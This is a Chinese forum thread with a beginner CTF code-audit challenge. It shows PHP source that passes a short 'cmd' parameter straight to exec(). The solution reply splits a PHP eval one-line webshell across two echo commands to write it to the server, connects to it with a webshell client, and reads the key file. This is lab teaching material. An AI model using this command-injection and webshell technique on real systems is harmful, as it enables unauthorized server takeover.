找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
热搜: 活动 交友 discuz
查看: 114|回复: 1

CTF入门小练习6 --- 代码审计(2)

[复制链接]

2万

主题

128

回帖

10万

积分

管理员

积分
105860
发表于 2022-6-2 11:25:45 | 显示全部楼层 |阅读模式 IP:山东省 移动/数据上网公共出口

登录后更精彩...O(∩_∩)O...

您需要 登录 才可以下载或查看,没有账号?立即注册

×
CTF入门小练习6 --- 代码审计(2)


题目:找key

地址:http://118.195.198.108:9999

7.png
[Bash shell] 纯文本查看 复制代码
0 <?php
    header("Content-type:text/html;charset=utf-8"); 
    /*
    Hint:
    get the shell find the key;)\n";
    */
    $sandbox = '/var/www/html/sandbox/' . md5("M0rk" . $_SERVER['REMOTE_ADDR']);
    mkdir($sandbox,0777,true);
    chdir($sandbox);
    echo strlen($_GET['cmd']);
    if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 30) {
        @exec($_GET['cmd']);
    } else if (isset($_GET['reset'])) {
        @exec('/bin/rm -rf ' . $sandbox);
    }
    highlight_file(__FILE__);
echo "<br /> IP : {$_SERVER['REMOTE_ADDR']}";

IP : 112.6.217.171

回复

使用道具 举报

2万

主题

128

回帖

10万

积分

管理员

积分
105860
 楼主| 发表于 2022-6-8 17:06:06 | 显示全部楼层 IP:山东省 移动/数据上网公共出口
解题:

用写一句话木马的方式,再用蚁剑链接
[Bash shell] 纯文本查看 复制代码
echo -n '<?php @eval('>1.php
echo '$_POST[p]);?>'>>1.php


链接url:
[HTML] 纯文本查看 复制代码
http://118.195.198.108:9999/sandbox/e88a247a3c3e198accf1081429e097d4/1.php


发现有个key.php,在虚拟终端中cat获取到key

[Bash shell] 纯文本查看 复制代码
cat key.php
<?php
#key3:Welc0Me From GooAnn
#

回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|IOTsec-Zone|在线工具|CTF WiKi|CTF平台汇总|CTF show|ctfhub|棱角安全|rutracker|攻防世界|php手册|peiqi文库|CyberChef|猫捉鱼铃|手机版|小黑屋|cn-sec|分享屋 ( 鲁ICP备2021028754号 )

GMT+8, 2024-5-18 19:48

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表